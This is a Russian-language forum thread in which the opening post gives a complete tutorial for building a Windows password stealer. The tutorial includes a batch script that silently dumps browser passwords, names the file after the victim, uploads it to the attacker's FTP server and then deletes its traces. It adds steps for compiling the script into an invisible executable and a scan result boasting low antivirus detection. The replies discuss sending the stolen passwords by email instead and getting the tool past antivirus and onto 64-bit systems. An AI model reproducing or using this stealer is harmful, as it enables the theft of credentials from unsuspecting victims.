Пишем стиллер на Batch

[OUTCAST]

Делаем стиллер, отсылающий отчёты на FTP.
И так, начнём!
1. Скачиваем программу DePass Micro (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

).

Из скачанного архива, нам понадобится только файл "DePass_Micro.exe". Разархивируйте его в удобное вам место.​

2. Скачиваем программу Bat To Exe Converter (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

).

Из скачанного архива, нам понадобится только папка "Portable". Разархивируйте его в удобное вам место.​

3. Скачиваем программу FTP Copy (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

).

Открываем наш скачанный архив, и заходим в папку "fcp-0.2". Из этой папки, нам понадобится только 2 файла:​

fcp.exe
pthreadGC.dll

Разархивируйте их туда, где файл "DePass_Micro.exe".​

4. Создаём батник и наполняем его содержимым:

@echo off
MD %TEMP%\H85R6TGRDER_7T45BBO7BS4E
copy DePass_Micro.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E
copy fcp.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E
copy pthreadGC.dll %TEMP%\H85R6TGRDER_7T45BBO7BS4E
cd %TEMP%\H85R6TGRDER_7T45BBO7BS4E
DePass_Micro.exe /Silent /nm
ren *.txt %COMPUTERNAME%_%USERNAME%.txt
fcp --user="Имя пользователя" --pass="Пароль" --server="Хост" --file=%COMPUTERNAME%_%USERNAME%.txt
cd %TEMP%
RD /s /q %TEMP%\H85R6TGRDER_7T45BBO7BS4E
del sqlite3.tmp

Поподробнее:
@echo off — Отключаем вывод команд на экран.
MD %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Создаём временную папку "H85R6TGRDER_7T45BBO7BS4E" в папке "Temp".
copy DePass_Micro.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "DePass_Micro.exe" в папку "H85R6TGRDER_7T45BBO7BS4E".
copy fcp.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "fcp.exe" в папку "H85R6TGRDER_7T45BBO7BS4E".
copy pthreadGC.dll %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "pthreadGC.dll" в папку "H85R6TGRDER_7T45BBO7BS4E".
cd %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Сменяем рабочий каталог на "%TEMP%\H85R6TGRDER_7T45BBO7BS4E".
DePass_Micro.exe /Silent /nm — Сохраняем пароли в файл .txt.
ren *.txt %COMPUTERNAME%_%USERNAME%.txt — Меняем имя нашего файла с паролями на "Имя компьютера"_"Имя пользователя".
fcp --user="Имя пользователя" --pass="Пароль" --server="Хост" --file=%COMPUTERNAME%_%USERNAME%.txt — Отправляем наш файл на FTP. Изменяем на своё то, что выделено красным цветом (кавычки не писать).
RD /s /q %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Удаляем нашу временную папку.
del sqlite3.tmp — удаляем наш временный файл.
5. Открываем программу Bat To Exe Converter из папки "Portable".
6. Где "Bat файл", выбираем наш созданный батник.
7. В дереве "Видимость приложения", ставим чекбокс на "Невидимое приложение".
8. В дереве "Рабочий каталог", ставим чекбокс на "Временный каталог".
9. Переходим во вкладку "Включить".
10. Нажимаем на кнопку "Добавить", и выбираем эти файлы:

DePass_Micro.exe
fcp.exe
pthreadGC.dll

11. Нажимаем на кнопку "Компилировать".
PERFECT!
В папке, где вы создали батник, появится наш стиллер!
Стиллер весит 1,25 МБ.
Спасибо за внимание!

СКАН
A-Squared: Clean
AVG Free: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Avast: Clean
Avira: Clean
BitDefender: Clean
BullGuard: Clean
Clam Antivirus: PUA.Win.Packer.Purebasic-2
Comodo Internet Security: Clean
Dr. Web: Clean
ESET NOD32: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
FortiClient: Clean
G Data: Clean
IKARUS Security: Trojan.Atros4
Jiangmin Antivirus 2011: TrojanDownloader.Paph.ds
K7 Ultimate: Trojan ( 0050856d1 )
Kaspersky Antivirus: Clean
MS Security Essentials: Clean
Malwarebytes Anti-Malware: Clean
McAfee: Clean
NANO Antivirus: Clean
Norton Antivirus: Clean
Outpost Antivirus Pro: Clean
Panda Security: Trj/Genetic.gen
Quick Heal Antivirus: Clean
SUPERAntiSpyware: Clean
Solo Antivirus: Clean
Sophos: Clean
TrustPort Antivirus: Clean
Twister Antivirus: Clean
VBA32 Antivirus: Clean
VirIT eXplorer: Clean
Zillya! Internet Security: Clean
eScan Antivirus: Clean
eTrust-Vet: Clean

File Name: Stealer.exe
Detected by: 5/38
File Size: 1.25 MB​

 

[DUSHATYT228]

Какую инфу стиллит?

 

[OUTCAST]

Какую инфу стиллит?

Больше 100 браузеров. В том числе яндекс браузер, хром, мозила, опера, сафари и так далее.)

 

[VAVAN]

Найс штука да еще и фуд, собрал по своему и получается вполне не плохо

 

[LUKAGREEN]

простите великодушно но я немножко не понял чем компилировать 7

 

[PingvinPingvin]

А потом стиленные пароли где будут находится?

 

[PingvinPingvin]

простите великодушно но я немножко не понял чем компилировать 7

Компилировать программой Bat To Exe Comvert , там внизу написано "Компилировать"

 

[ERMAG]

очень интересная прога уже увидел как на почту такое сделать можно.вообще гуд !

 

[PingvinPingvin]

, А вот у меня вопрос , как сделать так , чтобы он копировал пароли на почту или с этой прогой так нельзя сделать?

 

[PingvinPingvin]

, Ой сглупил , подскажи пожалуйста , как это сделать?

 

[ERMAG]

А вот у меня вопрос , как сделать так , чтобы он копировал пароли на почту или с этой прогой так нельзя сделать?

самое обычное есть программа Blat так же есть аналог и mailsend ещё я делал обычным vbs без левых программ так что вот тебе пища для размышлений.

 

[ergood]

да раньше делали сборочку то ли радмин то ли рмс с Blat в данный момент палится .

 

[ERMAG]

мне интересно зачем команда @echo off — Отключаем вывод команд на экран. если будешь использовать программу Bat To Exe Converter ?

 

[ergood]

мне интересно зачем команда @echo off — Отключаем вывод команд на экран. если будешь использовать программу Bat To Exe Converter ?

возможно эта команда немножко скроит надписи когда сработает проактивка например аваст и будет просто чёрное окно.

 

[MrBatcik]

собрал стиллер без Bat To Exe Converter не палится топ антивирусами вот одна проблема не работает на 64х все скрипты команды итд перепробовал с отправкой на почту и на фтп не смог создать нормальный стиллер чтоб работал на 64х кто может помочь буду благодарен

 

[Gumanoid]

Дико извиняюсь но есть поподробнее видео мануал,если есть то ссылочка тоже поможет